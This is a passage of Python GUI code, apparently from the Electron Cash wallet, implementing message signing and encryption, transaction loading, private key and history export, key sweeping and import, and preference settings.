verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
return PasswordDialog(parent, msg).run()
def tx_from_text(self, txt):
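# Parse a raw transaction from text. On success returns a Transaction, with
# 'value' filled in for any inputs that spend this wallet's own coins; on
# failure shows a critical error dialog and returns None.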
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx, sign_schnorr=self.wallet.is_schnorr_enabled())
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
# Due to the asynchronous nature of the qr reader we need to keep the
# dialog instance as member variable to prevent reentrancy/multiple ones
# from being presented at once.
_qr_dialog = None
def read_tx_from_qrcode(self):
if self._qr_dialog:
# Re-entrancy prevention -- there is some lag between when the user
# taps the QR button and the modal dialog appears. We want to
# prevent multiple instances of the dialog from appearing, so we
# must do this.
self.print_error("Warning: QR dialog is already presented, ignoring.")
return
if self.gui_object.warn_if_cant_import_qrreader(self):
return
from electroncash import get_config
from .qrreader import QrReaderCameraDialog
data = ''
self._qr_dialog = None
try:
self._qr_dialog = QrReaderCameraDialog(parent=self.top_level_window())
def _on_qr_reader_finished(success: bool, error: str, result):
if self._qr_dialog:
self._qr_dialog.deleteLater(); self._qr_dialog = None
if not success:
if error:
self.show_error(error)
return
if not result:
return
# if the user scanned a bitcoincash URI
if result.lower().startswith(networks.net.CASHADDR_PREFIX + ':') or result.lower().startswith(networks.net.SLPADDR_PREFIX + ':'):
self.pay_to_URI(result)
return
# else if the user scanned an offline signed tx
try:
result = bh2u(bitcoin.base_decode(result, length=None, base=43))
tx = self.tx_from_text(result) # will show an error dialog on error
if not tx:
return
except BaseException as e:
self.show_error(str(e))
return
self.show_transaction(tx)
self._qr_dialog.qr_finished.connect(_on_qr_reader_finished)
self._qr_dialog.start_scan(get_config().get_video_device())
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self._qr_dialog = None
self.show_error(str(e))
def read_tx_from_file(self, *, fileName = None):
fileName = fileName or self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r", encoding='utf-8') as f:
file_content = f.read()
file_content = file_content.strip()
tx_file_dict = json.loads(str(file_content))
except (ValueError, IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self.top_level_window(), _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self, *, fileName = None):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file(fileName=fileName)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self, *, txid=None, parent=None):
parent = parent or self
if self.gui_object.warn_if_no_network(parent):
return
from electroncash import transaction
ok = txid is not None
if not ok:
txid, ok = QInputDialog.getText(parent, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
ok, r = self.network.get_raw_tx_for_txid(txid, timeout=10.0)
if not ok:
parent.show_message(_("Error retrieving transaction") + ":\n" + r)
return
tx = transaction.Transaction(r, sign_schnorr=self.wallet.is_schnorr_enabled()) # note that presumably the tx is already signed if it comes from blockchain so this sign_schnorr parameter is superfluous, but here to satisfy my OCD -Calin
self.show_transaction(tx)
def export_bip38_dialog(self):
''' Convenience method. Simply calls self.export_privkeys_dialog(bip38=True) '''
self.export_privkeys_dialog(bip38 = True)
@protected
def export_privkeys_dialog(self, password, *, bip38=False):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
if bip38:
self.show_error(_('WARNING: This is a multi-signature wallet.') + '\n' +
_("It cannot be used with BIP38 encrypted keys."))
return
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
if bip38:
if not bitcoin.Bip38Key.canEncrypt() or not bitcoin.Bip38Key.isFast():
self.show_error(_("BIP38 Encryption is not available. Please install 'pycryptodomex' and restart Electron Cash to enable BIP38."))
return
passphrase = self.get_passphrase_dialog(
msg = (
_("You are exporting your wallet's private keys as BIP38 encrypted keys.") + "\n\n" +
_("You must specify a passphrase to use for encryption.") + "\n" +
_("Save this passphrase so you may decrypt your BIP38 keys later.")
)
)
if not passphrase:
# user cancel
return
bip38 = passphrase # overwrite arg with passphrase.. for use down below ;)
class MyWindowModalDialog(WindowModalDialog):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
d = MyWindowModalDialog(self.top_level_window(), _('Private keys'))
weak_d = Weak.ref(d)
d.setObjectName('WindowModalDialog - Private Key Export')
destroyed_print_error(d) # track object lifecycle
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
lines = [ _("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.") ]
if bip38:
del lines[0] # No need to scream-WARN them since BIP38 *are* encrypted
msg = '\n'.join(lines)
vbox.addWidget(QLabel(msg))
if bip38:
wwlbl = WWLabel()
def set_ww_txt(pf_shown=False):
if pf_shown:
pf_text = ("<font face='{monoface}' size=+1><b>"
+ bip38
+ '</b></font> <a href="hide">{link}</a>').format(link=_("Hide"), monoface=MONOSPACE_FONT)
else:
pf_text = '<a href="show">{link}</a>'.format(link=_("Click to show"))
wwlbl.setText(
_("The below keys are BIP38 <i>encrypted</i> using the passphrase: {passphrase}<br>"
"Please <i>write this passphrase down</i> and store it in a secret place, separate from these encrypted keys."
).format(passphrase=pf_text)
)
def toggle_ww_txt(link):
set_ww_txt(link=="show")
set_ww_txt()
wwlbl.linkActivated.connect(toggle_ww_txt)
vbox.addWidget(wwlbl)
e = QTextEdit()
e.setFont(QFont(MONOSPACE_FONT))
e.setWordWrapMode(QTextOption.NoWrap)
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv' if not bip38 else 'electron-cash-bip38-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
stop = False
def privkeys_thread():
for addr in addresses:
if not bip38:
# This artificial sleep is likely a security / paranoia measure
# to allow user to cancel or to make the process "feel expensive".
# In the bip38 case it's already slow enough so this delay
# is not needed.
time.sleep(0.100)
if stop:
return
try:
privkey = self.wallet.export_private_key(addr, password)
if bip38 and privkey:
privkey = str(bitcoin.Bip38Key.encrypt(privkey, bip38)) # __str__() -> base58 encoded bip38 key
except InvalidPassword:
# See #921 -- possibly a corrupted wallet or other strangeness
privkey = 'INVALID_PASSWORD'
if self.is_slp_wallet: #TODO: also create special prefix for SLP wallet private keys
private_keys[addr.to_full_string(Address.FMT_SLPADDR)] = privkey
else:
private_keys[addr.to_full_string(Address.FMT_CASHADDR)] = privkey
strong_d = weak_d()
try:
if strong_d and not stop:
strong_d.computing_privkeys_signal.emit()
else:
return
finally:
del strong_d
if stop:
return
strong_d = weak_d()
if strong_d:
strong_d.show_privkeys_signal.emit()
def show_privkeys():
nonlocal stop
if stop:
return
s = "\n".join('{:45} {}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
stop = True
thr = None
def on_dialog_closed(*args):
nonlocal stop
stop = True
try: d.computing_privkeys_signal.disconnect()
except TypeError: pass
try: d.show_privkeys_signal.disconnect()
except TypeError: pass
try: d.finished.disconnect()
except TypeError: pass
if thr and thr.is_alive():
thr.join(timeout=1.0) # wait for thread to end for maximal GC mojo
def computing_privkeys_slot():
if stop:
return
e.setText(_("Please wait... {num}/{total}").format(num=len(private_keys),total=len(addresses)))
d.computing_privkeys_signal.connect(computing_privkeys_slot)
d.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
thr = threading.Thread(target=privkeys_thread, daemon=True)
thr.start()
res = d.exec_()
if not res:
stop = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+", encoding='utf-8') as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
data = f.read()
data = json.loads(data)
if type(data) is not dict or not len(data) or not all(type(v) is str and type(k) is str for k,v in data.items()):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in data.items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.utxo_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
with open(fileName, 'w+', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self.top_level_window(), _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
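# Write the wallet history to fileName, either as CSV rows or as a JSON list.
# Fiat value/balance columns are included only when fiat history display is
# enabled and present in the exported data.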
history = wallet.export_history(fx=self.fx)
ccy = (self.fx and self.fx.get_currency()) or ''
has_fiat_columns = history and self.fx and self.fx.show_history() and 'fiat_value' in history[0] and 'fiat_balance' in history[0]
lines = []
for item in history:
if is_csv:
cols = [item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['date']]
if has_fiat_columns:
cols += [item['fiat_value'], item['fiat_balance']]
lines.append(cols)
else:
if has_fiat_columns and ccy:
item['fiat_currency'] = ccy # add the currency to each entry in the json. this wastes space but json is bloated anyway so this won't hurt too much, we hope
elif not has_fiat_columns:
# No need to include these fields as they will always be 'No Data'
item.pop('fiat_value', None)
item.pop('fiat_balance', None)
lines.append(item)
with open(fileName, "w+", encoding="utf-8") as f: # ensure encoding to utf-8. Avoid Windows cp1252. See #1453.
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
cols = ["transaction_hash","label", "confirmations", "value", "timestamp"]
if has_fiat_columns:
cols += [f"fiat_value_{ccy}", f"fiat_balance_{ccy}"] # in CSV mode, we use column names eg fiat_value_USD, etc
transaction.writerow(cols)
for line in lines:
transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
def sweep_key_dialog(self):
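# Prompt for private keys (WIF, or BIP38 where available), decrypt any BIP38
# keys via Bip38Importer, then prepare a max-send of the swept coins to one of
# this wallet's own addresses.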
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self.top_level_window(), title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
bip38_warn_label = QLabel(_("<b>BIP38 support is disabled because a requisite library is not installed.</b> Please install 'cryptodomex' or omit BIP38 private keys (private keys starting in 6P...). Decrypt keys to WIF format (starting with 5, K, or L) in order to sweep."))
bip38_warn_label.setWordWrap(True)
bip38_warn_label.setHidden(True)
vbox.addWidget(bip38_warn_label)
extra = ""
if bitcoin.is_bip38_available():
extra += " " + _('or BIP38 keys')
vbox.addWidget(QLabel(_("Enter private keys") + extra + " :"))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText(), allow_bip38=True)
def has_bip38_keys_but_no_bip38():
if bitcoin.is_bip38_available():
return False
keys = [k for k in keys_e.toPlainText().split() if k]
return any(bitcoin.is_bip38_key(k) for k in keys)
def enable_sweep():
bad_bip38 = has_bip38_keys_but_no_bip38()
sweepok = bool(get_address_text() and not bad_bip38 and get_priv_keys())
sweep_button.setEnabled(sweepok)
bip38_warn_label.setHidden(not bad_bip38)
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
res = d.exec_()
d.setParent(None)
if not res:
return
try:
self.do_clear()
keys = get_priv_keys()
bip38s = {}
for i, k in enumerate(keys):
if bitcoin.is_bip38_key(k):
bip38s[k] = i
if bip38s:
# For all the BIP38s detected, prompt for password
from .bip38_importer import Bip38Importer
d2 = Bip38Importer(bip38s.keys(), parent=self.top_level_window())
d2.exec_()
d2.setParent(None)
if d2.decoded_keys:
for k,tup in d2.decoded_keys.items():
wif, adr = tup
# rewrite the keys they specified with the decrypted WIF in the keys list for sweep_preparations to work below...
i = bip38s[k]
keys[i] = wif
else:
self.show_message(_("User cancelled"))
return
coins, keypairs = sweep_preparations(keys, self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
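# Generic import helper: prompt for a whitespace-separated list of entries,
# apply func to each one, then report which entries were added and which
# failed (with per-item error details). Used e.g. by import_addresses() and
# do_import_privkey() below.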
text = text_dialog(self.top_level_window(), title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad, bad_info = [], []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
bad_info.append("{}: {}".format(key, str(e)))
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_warning(_("The following could not be imported") + ':\n' + '\n'.join(bad), detail_text='\n\n'.join(bad_info))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
if bitcoin.is_bip38_available():
msg += " " + _('or BIP38 keys')
def func(key):
if bitcoin.is_bip38_available() and bitcoin.is_bip38_key(key):
from .bip38_importer import Bip38Importer
d = Bip38Importer([key], parent=self.top_level_window(),
message = _('A BIP38 key was specified, please enter a password to decrypt it'),
show_count = False)
d.exec_()
d.setParent(None) # python GC quicker if this happens
if d.decoded_keys:
wif, adr = d.decoded_keys[key]
return self.wallet.import_private_key(wif, password)
else:
raise util.UserCancelled()
else:
return self.wallet.import_private_key(key, password)
self._do_import(title, msg, func)
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
if not self.amount_e.isVisible():
self.fiat_send_e.setVisible(False)
else:
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def cashaddr_icon(self):
if self.config.get('addr_format', 0) == 1:
return QIcon(":icons/tab_converter.svg")
elif self.config.get('addr_format', 0)==2:
return QIcon(":icons/tab_converter_slp.svg")
else:
return QIcon(":icons/tab_converter_bw.svg")
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
def toggle_cashaddr_status_bar(self):
self.toggle_cashaddr(self.config.get('addr_format', 2))
def toggle_cashaddr_settings(self,state):
self.toggle_cashaddr(state, True)
def toggle_cashaddr(self, format, specified = False):
# GUI toggle should just increment; if "specified" is True it is being set from preferences, so leave the value as is.
if specified==False:
if self.is_slp_wallet:
max_format=2
else:
max_format=1
format+=1
if format > max_format:
format=0
self.config.set_key('addr_format', format)
Address.show_cashaddr(format)
self.setAddrFormatText(format)
for window in self.gui_object.windows:
window.cashaddr_toggled_signal.emit()
def setAddrFormatText(self, format):
try:
if format == 0:
self.addr_format_label.setText("Addr Format: Legacy")
elif format == 1:
self.addr_format_label.setText("Addr Format: Cash")
else:
self.addr_format_label.setText("Addr Format: SLP")
except AttributeError:
pass
def settings_dialog(self):
class SettingsModalDialog(WindowModalDialog):
shown_signal = pyqtSignal()
def showEvent(self, e):
super().showEvent(e)
self.shown_signal.emit()
self.need_restart = False
dialog_finished = False
d = SettingsModalDialog(self.top_level_window(), _('Preferences'))
d.setObjectName('WindowModalDialog - Preferences')
destroyed_print_error(d)
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
global_tx_widgets, per_wallet_tx_widgets = [], []
id_widgets = []
addr_format_choices = ["Legacy Format","CashAddr Format","SLP Format"]
addr_format_dict={'Legacy Format':0,'CashAddr Format':1,'SLP Format':2}
msg = _('Choose which format the wallet displays for Bitcoin Cash addresses')
addr_format_label = HelpLabel(_('Address Format') + ':', msg)
addr_format_combo = QComboBox()
addr_format_combo.addItems(addr_format_choices)
addr_format_combo.setCurrentIndex(self.config.get("addr_format", 0))
addr_format_combo.currentIndexChanged.connect(self.toggle_cashaddr_settings)
gui_widgets.append((addr_format_label,addr_format_combo))
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages, get_system_language_match, match_language
language_names = []
language_keys = []
for (lang_code, lang_def) in languages.items():
language_keys.append(lang_code)
lang_name = []
lang_name.append(lang_def.name)
if lang_code == '':
# System entry in languages list (==''), gets system setting
sys_lang = get_system_language_match()
if sys_lang:
lang_name.append(f' [{languages[sys_lang].name}]')
language_names.append(''.join(lang_name))
lang_combo.addItems(language_names)
conf_lang = self.config.get("language", '')
if conf_lang:
# The below code allows us to rename languages in saved config and
# have them still line up with languages in our languages dict.
# For example we used to save English as en_UK but now it's en_US
# and it will still match
conf_lang = match_language(conf_lang)
try: index = language_keys.index(conf_lang)
except ValueError: index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.update_tabs()
self.update_status()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
if self.fee_custom_lbl.text() == '':
self.fee_slider_mogrifier(self.get_custom_fee_text())
else:
self.fee_slider_mogrifier()
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom fee rate:'), _('Custom Fee Rate in Satoshis per byte'))
fee_widgets.append((customfee_label, customfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link/']) + '\n\n'\
+ _('For more information, see http://openalias.org')
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = util.base_unit_labels # ( 'BCH', 'mBCH', 'bits' )
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 bits.\n' \
+ _(' This setting affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
dp = util.base_units.get(unit_result)
if dp is not None:
self.decimal_point = dp
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_tabs()
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online block explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
qr_combo = QComboBox()
qr_label = HelpLabel(_('Video device'), '')
qr_did_scan = False
def set_no_camera(e=''):
# Older Qt or missing libs -- disable GUI control and inform user why
qr_combo.setEnabled(False)
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_combo.setToolTip(_("Unable to probe for cameras on this system. QtMultimedia is likely missing."))
qr_label.setText(_('Video device') + ' ' + _('(disabled)') + ':')
qr_label.help_text = qr_combo.toolTip() + "\n\n" + str(e)
qr_label.setToolTip(qr_combo.toolTip())
def scan_cameras():
nonlocal qr_did_scan
if qr_did_scan or dialog_finished: # dialog_finished guard needed because QueuedConnection
# already scanned or dialog finished quickly
return
qr_did_scan = True
system_cameras = []
try:
from PyQt5.QtMultimedia import QCameraInfo
except ImportError as e:
set_no_camera(e)
return
system_cameras = QCameraInfo.availableCameras()
qr_combo.clear()
